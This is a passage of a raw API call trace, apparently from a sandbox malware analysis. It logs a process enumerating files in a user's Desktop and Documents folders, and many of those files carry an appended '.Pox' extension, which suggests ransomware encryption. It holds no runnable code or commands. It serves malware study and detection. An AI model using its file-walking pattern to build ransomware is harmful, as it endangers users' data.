ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0 [0038.690] FindClose (in: hFindFile=0x4061c8 | out: hFindFile=0x4061c8) returned 1 [0038.690] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x3ae564) returned 1 [0038.690] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x3ae570) returned 1 [0038.690] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x3ae5a4) returned 1 [0038.690] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\tQYzvy44", nBufferLength=0x105, lpBuffer=0x3ae0ac, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\tQYzvy44", lpFilePart=0x0) returned 0x2e [0038.690] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\tQYzvy44\\", nBufferLength=0x105, lpBuffer=0x3ae080, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\tQYzvy44\\", lpFilePart=0x0) returned 0x2f [0038.690] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\tQYzvy44\\*", lpFindFileData=0x3ae2cc | out: lpFindFileData=0x3ae2cc*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x55265fc0, ftCreationTime.dwHighDateTime=0x1d4c618, ftLastAccessTime.dwLowDateTime=0x28f175e0, ftLastAccessTime.dwHighDateTime=0x1d53803, ftLastWriteTime.dwLowDateTime=0x28f175e0, ftLastWriteTime.dwHighDateTime=0x1d53803, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x4061c8 [0038.690] FindNextFileW (in: hFindFile=0x4061c8, lpFindFileData=0x3ae2dc | out: lpFindFileData=0x3ae2dc*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x55265fc0, ftCreationTime.dwHighDateTime=0x1d4c618, ftLastAccessTime.dwLowDateTime=0x28f175e0, ftLastAccessTime.dwHighDateTime=0x1d53803, ftLastWriteTime.dwLowDateTime=0x28f175e0, ftLastWriteTime.dwHighDateTime=0x1d53803, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0038.691] FindNextFileW (in: hFindFile=0x4061c8, lpFindFileData=0x3ae2dc | out: lpFindFileData=0x3ae2dc*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xb3aa6920, ftCreationTime.dwHighDateTime=0x1d4c739, ftLastAccessTime.dwLowDateTime=0xbc163300, ftLastAccessTime.dwHighDateTime=0x1d4c874, ftLastWriteTime.dwLowDateTime=0xbc163300, ftLastWriteTime.dwHighDateTime=0x1d4c874, nFileSizeHigh=0x0, nFileSizeLow=0xa81a, dwReserved0=0x0, dwReserved1=0x0, cFileName="0b1kQACiak6.ots", cAlternateFileName="0B1KQA~1.OTS")) returned 1 [0038.691] FindNextFileW (in: hFindFile=0x4061c8, lpFindFileData=0x3ae2dc | out: lpFindFileData=0x3ae2dc*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xfba30340, ftCreationTime.dwHighDateTime=0x1d4cfbd, ftLastAccessTime.dwLowDateTime=0xdcfd3420, ftLastAccessTime.dwHighDateTime=0x1d4d174, ftLastWriteTime.dwLowDateTime=0x28d746c0, ftLastWriteTime.dwHighDateTime=0x1d53803, nFileSizeHigh=0x0, nFileSizeLow=0x1de0, dwReserved0=0x0, dwReserved1=0x0, cFileName="afnTu.mkv.Pox", cAlternateFileName="AFNTUM~1.POX")) returned 1 [0038.691] FindNextFileW (in: hFindFile=0x4061c8, lpFindFileData=0x3ae2dc | out: lpFindFileData=0x3ae2dc*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x816b2d0, ftCreationTime.dwHighDateTime=0x1d4c55e, ftLastAccessTime.dwLowDateTime=0xb50f35e0, ftLastAccessTime.dwHighDateTime=0x1d4d295, ftLastWriteTime.dwLowDateTime=0x28e32da0, ftLastWriteTime.dwHighDateTime=0x1d53803, nFileSizeHigh=0x0, nFileSizeLow=0x16cd0, dwReserved0=0x0, dwReserved1=0x0, cFileName="GXNTB.jpg.Pox", cAlternateFileName="GXNTBJ~1.POX")) returned 1 [0038.691] FindNextFileW (in: hFindFile=0x4061c8, lpFindFileData=0x3ae2dc | out: lpFindFileData=0x3ae2dc*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x3a13870, ftCreationTime.dwHighDateTime=0x1d4ceef, ftLastAccessTime.dwLowDateTime=0xc23210, ftLastAccessTime.dwHighDateTime=0x1d4c915, ftLastWriteTime.dwLowDateTime=0x28ea51c0, ftLastWriteTime.dwHighDateTime=0x1d53803, nFileSizeHigh=0x0, nFileSizeLow=0x18e90, dwReserved0=0x0, dwReserved1=0x0, cFileName="kHfLoG p4e5.pdf.Pox", cAlternateFileName="KHFLOG~1.POX")) returned 1 [0038.691] FindNextFileW (in: hFindFile=0x4061c8, lpFindFileData=0x3ae2dc | out: lpFindFileData=0x3ae2dc*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x60d417a0, ftCreationTime.dwHighDateTime=0x1d4c676, ftLastAccessTime.dwLowDateTime=0x2a3f27c0, ftLastAccessTime.dwHighDateTime=0x1d4d247, ftLastWriteTime.dwLowDateTime=0x28f175e0, ftLastWriteTime.dwHighDateTime=0x1d53803, nFileSizeHigh=0x0, nFileSizeLow=0x15300, dwReserved0=0x0, dwReserved1=0x0, cFileName="pKpIeF7B-b-a.csv.Pox", cAlternateFileName="PKPIEF~1.POX")) returned 1 [0038.691] FindNextFileW (in: hFindFile=0x4061c8, lpFindFileData=0x3ae2dc | out: lpFindFileData=0x3ae2dc*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x60d417a0, ftCreationTime.dwHighDateTime=0x1d4c676, ftLastAccessTime.dwLowDateTime=0x2a3f27c0, ftLastAccessTime.dwHighDateTime=0x1d4d247, ftLastWriteTime.dwLowDateTime=0x28f175e0, ftLastWriteTime.dwHighDateTime=0x1d53803, nFileSizeHigh=0x0, nFileSizeLow=0x15300, dwReserved0=0x0, dwReserved1=0x0, cFileName="pKpIeF7B-b-a.csv.Pox", cAlternateFileName="PKPIEF~1.POX")) returned 0 [0038.691] FindClose (in: hFindFile=0x4061c8 | out: hFindFile=0x4061c8) returned 1 [0038.692] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x3ae564) returned 1 [0038.692] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x3ae570) returned 1 [0038.692] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x3ae5a4) returned 1 [0038.692] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\Zh5KHKzPc6AOkC3JGPhN", nBufferLength=0x105, lpBuffer=0x3ae0ac, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\Zh5KHKzPc6AOkC3JGPhN", lpFilePart=0x0) returned 0x3a [0038.692] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\Zh5KHKzPc6AOkC3JGPhN\\", nBufferLength=0x105, lpBuffer=0x3ae080, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\Zh5KHKzPc6AOkC3JGPhN\\", lpFilePart=0x0) returned 0x3b [0038.692] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\Zh5KHKzPc6AOkC3JGPhN\\*", lpFindFileData=0x3ae2cc | out: lpFindFileData=0x3ae2cc*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x5d050ed0, ftCreationTime.dwHighDateTime=0x1d4c956, ftLastAccessTime.dwLowDateTime=0x28f638a0, ftLastAccessTime.dwHighDateTime=0x1d53803, ftLastWriteTime.dwLowDateTime=0x28f638a0, ftLastWriteTime.dwHighDateTime=0x1d53803, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x4061c8 [0038.692] FindNextFileW (in: hFindFile=0x4061c8, lpFindFileData=0x3ae2dc | out: lpFindFileData=0x3ae2dc*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x5d050ed0, ftCreationTime.dwHighDateTime=0x1d4c956, ftLastAccessTime.dwLowDateTime=0x28f638a0, ftLastAccessTime.dwHighDateTime=0x1d53803, ftLastWriteTime.dwLowDateTime=0x28f638a0, ftLastWriteTime.dwHighDateTime=0x1d53803, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0038.692] FindNextFileW (in: hFindFile=0x4061c8, lpFindFileData=0x3ae2dc | out: lpFindFileData=0x3ae2dc*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x55866910, ftCreationTime.dwHighDateTime=0x1d4ccc6, ftLastAccessTime.dwLowDateTime=0xb41e1e10, ftLastAccessTime.dwHighDateTime=0x1d4d0f3, ftLastWriteTime.dwLowDateTime=0x28f638a0, ftLastWriteTime.dwHighDateTime=0x1d53803, nFileSizeHigh=0x0, nFileSizeLow=0x6950, dwReserved0=0x0, dwReserved1=0x0, cFileName="80Sx6N6hteC.mp3.Pox", cAlternateFileName="80SX6N~1.POX")) returned 1 [0038.692] FindNextFileW (in: hFindFile=0x4061c8, lpFindFileData=0x3ae2dc | out: lpFindFileData=0x3ae2dc*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x74006f20, ftCreationTime.dwHighDateTime=0x1d4c79f, ftLastAccessTime.dwLowDateTime=0x4db3390, ftLastAccessTime.dwHighDateTime=0x1d4cbc4, ftLastWriteTime.dwLowDateTime=0x4db3390, ftLastWriteTime.dwHighDateTime=0x1d4cbc4, nFileSizeHigh=0x0, nFileSizeLow=0x95e2, dwReserved0=0x0, dwReserved1=0x0, cFileName="9edNK3IVw1MImZ82b.m4a", cAlternateFileName="9EDNK3~1.M4A")) returned 1 [0038.692] FindNextFileW (in: hFindFile=0x4061c8, lpFindFileData=0x3ae2dc | out: lpFindFileData=0x3ae2dc*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xb3d63400, ftCreationTime.dwHighDateTime=0x1d4d1c1, ftLastAccessTime.dwLowDateTime=0x60dfa910, ftLastAccessTime.dwHighDateTime=0x1d4ca97, ftLastWriteTime.dwLowDateTime=0x60dfa910, ftLastWriteTime.dwHighDateTime=0x1d4ca97, nFileSizeHigh=0x0, nFileSizeLow=0x13a76, dwReserved0=0x0, dwReserved1=0x0, cFileName="saeAQ1gG.m4a", cAlternateFileName="")) returned 1 [0038.692] FindNextFileW (in: hFindFile=0x4061c8, lpFindFileData=0x3ae2dc | out: lpFindFileData=0x3ae2dc*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0 [0038.693] FindClose (in: hFindFile=0x4061c8 | out: hFindFile=0x4061c8) returned 1 [0038.693] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x3ae564) returned 1 [0038.693] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x3ae570) returned 1 [0038.693] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x3ae5a4) returned 1 [0038.693] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\Zh5KHKzPc6AOkC3JGPhN", nBufferLength=0x105, lpBuffer=0x3ae0ac, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\Zh5KHKzPc6AOkC3JGPhN", lpFilePart=0x0) returned 0x3a [0038.693] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\Zh5KHKzPc6AOkC3JGPhN\\", nBufferLength=0x105, lpBuffer=0x3ae080, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\Zh5KHKzPc6AOkC3JGPhN\\", lpFilePart=0x0) returned 0x3b [0038.693] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\Zh5KHKzPc6AOkC3JGPhN\\*", lpFindFileData=0x3ae2cc | out: lpFindFileData=0x3ae2cc*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x5d050ed0, ftCreationTime.dwHighDateTime=0x1d4c956, ftLastAccessTime.dwLowDateTime=0x28f638a0, ftLastAccessTime.dwHighDateTime=0x1d53803, ftLastWriteTime.dwLowDateTime=0x28f638a0, ftLastWriteTime.dwHighDateTime=0x1d53803, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x4061c8 [0038.693] FindNextFileW (in: hFindFile=0x4061c8, lpFindFileData=0x3ae2dc | out: lpFindFileData=0x3ae2dc*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x5d050ed0, ftCreationTime.dwHighDateTime=0x1d4c956, ftLastAccessTime.dwLowDateTime=0x28f638a0, ftLastAccessTime.dwHighDateTime=0x1d53803, ftLastWriteTime.dwLowDateTime=0x28f638a0, ftLastWriteTime.dwHighDateTime=0x1d53803, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0038.693] FindNextFileW (in: hFindFile=0x4061c8, lpFindFileData=0x3ae2dc | out: lpFindFileData=0x3ae2dc*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x55866910, ftCreationTime.dwHighDateTime=0x1d4ccc6, ftLastAccessTime.dwLowDateTime=0xb41e1e10, ftLastAccessTime.dwHighDateTime=0x1d4d0f3, ftLastWriteTime.dwLowDateTime=0x28f638a0, ftLastWriteTime.dwHighDateTime=0x1d53803, nFileSizeHigh=0x0, nFileSizeLow=0x6950, dwReserved0=0x0, dwReserved1=0x0, cFileName="80Sx6N6hteC.mp3.Pox", cAlternateFileName="80SX6N~1.POX")) returned 1 [0038.693] FindNextFileW (in: hFindFile=0x4061c8, lpFindFileData=0x3ae2dc | out: lpFindFileData=0x3ae2dc*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x74006f20, ftCreationTime.dwHighDateTime=0x1d4c79f, ftLastAccessTime.dwLowDateTime=0x4db3390, ftLastAccessTime.dwHighDateTime=0x1d4cbc4, ftLastWriteTime.dwLowDateTime=0x4db3390, ftLastWriteTime.dwHighDateTime=0x1d4cbc4, nFileSizeHigh=0x0, nFileSizeLow=0x95e2, dwReserved0=0x0, dwReserved1=0x0, cFileName="9edNK3IVw1MImZ82b.m4a", cAlternateFileName="9EDNK3~1.M4A")) returned 1 [0038.693] FindNextFileW (in: hFindFile=0x4061c8, lpFindFileData=0x3ae2dc | out: lpFindFileData=0x3ae2dc*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xb3d63400, ftCreationTime.dwHighDateTime=0x1d4d1c1, ftLastAccessTime.dwLowDateTime=0x60dfa910, ftLastAccessTime.dwHighDateTime=0x1d4ca97, ftLastWriteTime.dwLowDateTime=0x60dfa910, ftLastWriteTime.dwHighDateTime=0x1d4ca97, nFileSizeHigh=0x0, nFileSizeLow=0x13a76, dwReserved0=0x0, dwReserved1=0x0, cFileName="saeAQ1gG.m4a", cAlternateFileName="")) returned 1 [0038.694] FindNextFileW (in: hFindFile=0x4061c8, lpFindFileData=0x3ae2dc | out: lpFindFileData=0x3ae2dc*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xb3d63400, ftCreationTime.dwHighDateTime=0x1d4d1c1, ftLastAccessTime.dwLowDateTime=0x60dfa910, ftLastAccessTime.dwHighDateTime=0x1d4ca97, ftLastWriteTime.dwLowDateTime=0x60dfa910, ftLastWriteTime.dwHighDateTime=0x1d4ca97, nFileSizeHigh=0x0, nFileSizeLow=0x13a76, dwReserved0=0x0, dwReserved1=0x0, cFileName="saeAQ1gG.m4a", cAlternateFileName="")) returned 0 [0038.694] FindClose (in: hFindFile=0x4061c8 | out: hFindFile=0x4061c8) returned 1 [0038.694] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x3ae564) returned 1 [0038.694] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x3ae570) returned 1 [0038.694] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x3ae618) returned 1 [0038.694] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents", nBufferLength=0x105, lpBuffer=0x3ae120, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents", lpFilePart=0x0) returned 0x27 [0038.694] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\", nBufferLength=0x105, lpBuffer=0x3ae0f4, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\", lpFilePart=0x0) returned 0x28 [0038.694] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\*", lpFindFileData=0x3ae340 | out: lpFindFileData=0x3ae340*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x179406a0, ftLastAccessTime.dwHighDateTime=0x1d53803, ftLastWriteTime.dwLowDateTime=0x179406a0, ftLastWriteTime.dwHighDateTime=0x1d53803, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x4061c8 [0038.694] FindNextFileW (in: hFindFile=0x4061c8, lpFindFileData=0x3ae350 | out: lpFindFileData=0x3ae350*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x179406a0, ftLastAccessTime.dwHighDateTime=0x1d53803, ftLastWriteTime.dwLowDateTime=0x179406a0, ftLastWriteTime.dwHighDateTime=0x1d53803, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0038.694] FindNextFileW (in: hFindFile=0x4061c8, lpFindFileData=0x3ae350 | out: lpFindFileData=0x3ae350*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x40238fb0, ftCreationTime.dwHighDateTime=0x1d50aad, ftLastAccessTime.dwLowDateTime=0x85834890, ftLastAccessTime.dwHighDateTime=0x1d4c758, ftLastWriteTime.dwLowDateTime=0x85834890, ftLastWriteTime.dwHighDateTime=0x1d4c758, nFileSizeHigh=0x0, nFileSizeLow=0x7cbb, dwReserved0=0x0, dwReserved1=0x0, cFileName="1pX_gB60 0bE4d3dn.pptx", cAlternateFileName="1PX_GB~1.PPT")) returned 1 [0038.694] FindNextFileW (in: hFindFile=0x4061c8, lpFindFileData=0x3ae350 | out: lpFindFileData=0x3ae350*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x66aa62b0, ftCreationTime.dwHighDateTime=0x1d4cb58, ftLastAccessTime.dwLowDateTime=0xd3615330, ftLastAccessTime.dwHighDateTime=0x1d4d3b1, ftLastWriteTime.dwLowDateTime=0xd3615330, ftLastWriteTime.dwHighDateTime=0x1d4d3b1, nFileSizeHigh=0x0, nFileSizeLow=0x89f9, dwReserved0=0x0, dwReserved1=0x0, cFileName="2vaMuPlZ6I8mh4S.docx", cAlternateFileName="2VAMUP~1.DOC")) returned 1 [0038.695] FindNextFileW (in: hFindFile=0x4061c8, lpFindFileData=0x3ae350 | out: lpFindFileData=0x3ae350*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x4b84e000, ftCreationTime.dwHighDateTime=0x1d4c946, ftLastAccessTime.dwLowDateTime=0x8d0bb710, ftLastAccessTime.dwHighDateTime=0x1d4ce14, ftLastWriteTime.dwLowDateTime=0x8d0bb710, ftLastWriteTime.dwHighDateTime=0x1d4ce14, nFileSizeHigh=0x0, nFileSizeLow=0xcdf5, dwReserved0=0x0, dwReserved1=0x0, cFileName="5Vv FMKnuQagvr1v.odt", cAlternateFileName="5VVFMK~1.ODT")) returned 1 [0038.695] FindNextFileW (in: hFindFile=0x4061c8, lpFindFileData=0x3ae350 | out: lpFindFileData=0x3ae350*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x361e0cb0, ftCreationTime.dwHighDateTime=0x1d53498, ftLastAccessTime.dwLowDateTime=0x564bee80, ftLastAccessTime.dwHighDateTime=0x1d53088, ftLastWriteTime.dwLowDateTime=0x564bee80, ftLastWriteTime.dwHighDateTime=0x1d53088, nFileSizeHigh=0x0, nFileSizeLow=0x17328, dwReserved0=0x0, dwReserved1=0x0, cFileName="at0FaHyq.pptx", cAlternateFileName="AT0FAH~1.PPT")) returned 1 [0038.695] FindNextFileW (in: hFindFile=0x4061c8, lpFindFileData=0x3ae350 | out: lpFindFileData=0x3ae350*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x4ca6de50, ftCreationTime.dwHighDateTime=0x1d4cdc6, ftLastAccessTime.dwLowDateTime=0x522ef980, ftLastAccessTime.dwHighDateTime=0x1d4b213, ftLastWriteTime.dwLowDateTime=0x522ef980, ftLastWriteTime.dwHighDateTime=0x1d4b213, nFileSizeHigh=0x0, nFileSizeLow=0xd08f, dwReserved0=0x0, dwReserved1=0x0, cFileName="c-OUqwNcpwZKsqZUKU.docx", cAlternateFileName="C-OUQW~1.DOC")) returned 1 [0038.695] FindNextFileW (in: hFindFile=0x4061c8, lpFindFileData=0x3ae350 | out: lpFindFileData=0x3ae350*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc7702460, ftCreationTime.dwHighDateTime=0x1d4d27c, ftLastAccessTime.dwLowDateTime=0xf59aa830, ftLastAccessTime.dwHighDateTime=0x1d4c9c9, ftLastWriteTime.dwLowDateTime=0xf59aa830, ftLastWriteTime.dwHighDateTime=0x1d4c9c9, nFileSizeHigh=0x0, nFileSizeLow=0x70fc, dwReserved0=0x0, dwReserved1=0x0, cFileName="CcxLxbYA5PVQheLVcI.ppt", cAlternateFileName="CCXLXB~1.PPT")) returned 1 [0038.695] FindNextFileW (in: hFindFile=0x4061c8, lpFindFileData=0x3ae350 | out: lpFindFileData=0x3ae350*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x28d4b900, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d4b900, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2d207440, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x192, dwReserved0=0x0, dwReserved1=0x0, cFileName="desktop.ini", cAlternateFileName="")) returned 1 [0038.695] FindNextFileW (in: hFindFile=0x4061c8, lpFindFileData=0x3ae350 | out: lpFindFileData=0x3ae350*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x3a569030, ftCreationTime.dwHighDateTime=0x1d5041a, ftLastAccessTime.dwLowDateTime=0x759d1ed0, ftLastAccessTime.dwHighDateTime=0x1d4e551, ftLastWriteTime.dwLowDateTime=0x759d1ed0, ftLastWriteTime.dwHighDateTime=0x1d4e551, nFileSizeHigh=0x0, nFileSizeLow=0x3eff, dwReserved0=0x0, dwReserved1=0x0, cFileName="DihjpK.docx", cAlternateFileName="DIHJPK~1.DOC")) returned 1 [0038.695] FindNextFileW (in: hFindFile=0x4061c8, lpFindFileData=0x3ae350 | out: lpFindFileData=0x3ae350*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x93b0a350, ftCreationTime.dwHighDateTime=0x1d52625, ftLastAccessTime.dwLowDateTime=0x75119b20, ftLastAccessTime.dwHighDateTime=0x1d50c76, ftLastWriteTime.dwLowDateTime=0x75119b20, ftLastWriteTime.dwHighDateTime=0x1d50c76, nFileSizeHigh=0x0, nFileSizeLow=0x13f35, dwReserved0=0x0, dwReserved1=0x0, cFileName="Dkou zZ n2_BH1.xlsx", cAlternateFileName="DKOUZZ~1.XLS")) returned 1 [0038.695] FindNextFileW (in: hFindFile=0x4061c8, lpFindFileData=0x3ae350 | out: lpFindFileData=0x3ae350*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x684a36a0, ftCreationTime.dwHighDateTime=0x1d4cd32, ftLastAccessTime.dwLowDateTime=0x8821f340, ftLastAccessTime.dwHighDateTime=0x1d4ce32, ftLastWriteTime.dwLowDateTime=0x8821f340, ftLastWriteTime.dwHighDateTime=0x1d4ce32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="eUU-xXmHIRDJW4 2Zx56", cAlternateFileName="EUU-XX~1")) returned 1 [0038.695] FindNextFileW (in: hFindFile=0x4061c8, lpFindFileData=0x3ae350 | out: lpFindFileData=0x3ae350*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xeb7600d0, ftCreationTime.dwHighDateTime=0x1d4c0e5, ftLastAccessTime.dwLowDateTime=0xaedc5c30, ftLastAccessTime.dwHighDateTime=0x1d4e67b, ftLastWriteTime.dwLowDateTime=0xaedc5c30, ftLastWriteTime.dwHighDateTime=0x1d4e67b, nFileSizeHigh=0x0, nFileSizeLow=0x16c36, dwReserved0=0x0, dwReserved1=0x0, cFileName="fKdo0m3dDNNLylacs0H.xlsx", cAlternateFileName="FKDO0M~1.XLS")) returned 1 [0038.696] FindNextFileW (in: hFindFile=0x4061c8, lpFindFileData=0x3ae350 | out: lpFindFileData=0x3ae350*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x77298290, ftCreationTime.dwHighDateTime=0x1d51461, ftLastAccessTime.dwLowDateTime=0x1c284890, ftLastAccessTime.dwHighDateTime=0x1d4b2af, ftLastWriteTime.dwLowDateTime=0x1c284890, ftLastWriteTime.dwHighDateTime=0x1d4b2af, nFileSizeHigh=0x0, nFileSizeLow=0x6eef, dwReserved0=0x0, dwReserved1=0x0, cFileName="I5LVn7OvnVGp4I.xlsx", cAlternateFileName="I5LVN7~1.XLS")) returned 1 [0038.696] FindNextFileW (in: hFindFile=0x4061c8, lpFindFileData=0x3ae350 | out: lpFindFileData=0x3ae350*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xb167c870, ftCreationTime.dwHighDateTime=0x1d4fe29, ftLastAccessTime.dwLowDateTime=0x39f67c0, ftLastAccessTime.dwHighDateTime=0x1d4c43b, ftLastWriteTime.dwLowDateTime=0x39f67c0, ftLastWriteTime.dwHighDateTime=0x1d4c43b, nFileSizeHigh=0x0, nFileSizeLow=0x13418, dwReserved0=0x0, dwReserved1=0x0, cFileName="KsPNdEKyG-iF8dd5Hv.xlsx", cAlternateFileName="KSPNDE~1.XLS")) returned 1 [0038.696] FindNextFileW (in: hFindFile=0x4061c8, lpFindFileData=0x3ae350 | out: lpFindFileData=0x3ae350*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x357d5ff0, ftCreationTime.dwHighDateTime=0x1d4cfbb, ftLastAccessTime.dwLowDateTime=0xb6c0e340, ftLastAccessTime.dwHighDateTime=0x1d4d2f2, ftLastWriteTime.dwLowDateTime=0xb6c0e340, ftLastWriteTime.dwHighDateTime=0x1d4d2f2, nFileSizeHigh=0x0, nFileSizeLow=0x27a7, dwReserved0=0x0, dwReserved1=0x0, cFileName="L88LW6Qd.ods", cAlternateFileName="")) returned 1 [0038.696] FindNextFileW (in: hFindFile=0x4061c8, lpFindFileData=0x3ae350 | out: lpFindFileData=0x3ae350*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x4bf6c2a0, ftCreationTime.dwHighDateTime=0x1d4f49e, ftLastAccessTime.dwLowDateTime=0x2ac14be0, ftLastAccessTime.dwHighDateTime=0x1d4bec6, ftLastWriteTime.dwLowDateTime=0x2ac14be0, ftLastWriteTime.dwHighDateTime=0x1d4bec6, nFileSizeHigh=0x0, nFileSizeLow=0x69b8, dwReserved0=0x0, dwReserved1=0x0, cFileName="m7dOR-18S 2XvaRj3rX9.pptx", cAlternateFileName="M7DOR-~1.PPT")) returned 1 [0038.696] FindNextFileW (in: hFindFile=0x4061c8, lpFindFileData=0x3ae350 | out: lpFindFileData=0x3ae350*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xab4e8f0, ftCreationTime.dwHighDateTime=0x1d52638, ftLastAccessTime.dwLowDateTime=0xe6655320, ftLastAccessTime.dwHighDateTime=0x1d526d4, ftLastWriteTime.dwLowDateTime=0xe6655320, ftLastWriteTime.dwHighDateTime=0x1d526d4, nFileSizeHigh=0x0, nFileSizeLow=0x15b41, dwReserved0=0x0, dwReserved1=0x0, cFileName="MUl3j_Wys.docx", cAlternateFileName="MUL3J_~1.DOC")) returned 1 [0038.696] 